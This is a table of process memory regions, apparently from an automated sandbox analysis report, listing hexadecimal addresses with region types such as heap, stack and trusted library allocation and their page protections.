|
240CA290000
|
heap
|
page read and write
|
||
|
2074307C000
|
heap
|
page read and write
|
||
|
240C82D0000
|
heap
|
page read and write
|
||
|
D82837F000
|
stack
|
page read and write
|
||
|
EADF7FE000
|
stack
|
page read and write
|
||
|
D8288BF000
|
stack
|
page read and write
|
||
|
7DF498140000
|
trusted library allocation
|
page execute and read and write
|
||
|
240CA1BF000
|
heap
|
page read and write
|
||
|
240CA250000
|
heap
|
page read and write
|
||
|
7FFE16900000
|
trusted library allocation
|
page read and write
|
||
|
7FFE165DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFE167C0000
|
trusted library allocation
|
page read and write
|
||
|
2074328B000
|
heap
|
page read and write
|
||
|
1F9DADD9000
|
trusted library allocation
|
page read and write
|
||
|
240CA244000
|
heap
|
page read and write
|
||
|
1F9DA3D0000
|
heap
|
page read and write
|
||
|
20729280000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16800000
|
trusted library allocation
|
page read and write
|
||
|
D8286B8000
|
stack
|
page read and write
|
||
|
1F9F2A0F000
|
heap
|
page read and write
|
||
|
7FFE166E4000
|
trusted library allocation
|
page read and write
|
||
|
240CA26E000
|
heap
|
page read and write
|
||
|
240CA344000
|
heap
|
page read and write
|
||
|
D82827E000
|
stack
|
page read and write
|
||
|
1F9DA360000
|
heap
|
page readonly
|
||
|
240CA270000
|
heap
|
page read and write
|
||
|
2072905C000
|
heap
|
page read and write
|
||
|
1F9DAD9A000
|
trusted library allocation
|
page read and write
|
||
|
7FFE16820000
|
trusted library allocation
|
page read and write
|
||
|
240CA1F5000
|
heap
|
page read and write
|
||
|
240C85C5000
|
heap
|
page read and write
|
||
|
1F9DA3D6000
|
heap
|
page read and write
|
||
|
20743020000
|
heap
|
page read and write
|
||
|
7FFE167C0000
|
trusted library allocation
|
page read and write
|
||
|
1F9F2CA9000
|
heap
|
page read and write
|
||
|
1F9DA9B9000
|
trusted library allocation
|
page read and write
|
||
|
7FFE168F0000
|
trusted library allocation
|
page read and write
|
||
|
1F9D8ACE000
|
heap
|
page read and write
|
||
|
2072B449000
|
trusted library allocation
|
page read and write
|
There are 404 hidden memdumps, click here to show them.